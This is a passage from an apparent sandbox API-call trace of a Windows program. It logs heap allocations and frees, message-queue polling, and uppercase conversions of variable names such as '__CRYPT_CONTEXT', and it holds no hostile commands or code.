| out: hHeap=0x970000) returned 1 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0252.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0252.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0252.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0252.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0252.996] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0252.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0253.070] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0253.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0253.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0253.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0253.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0253.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0253.071] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0253.071] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.071] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0253.072] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0253.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.074] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0253.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0253.074] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0253.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0253.075] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0253.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0253.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.076] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0253.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0253.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.077] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0253.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0253.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.078] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.078] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.078] HeapFree (in: hHeap=0x970000, 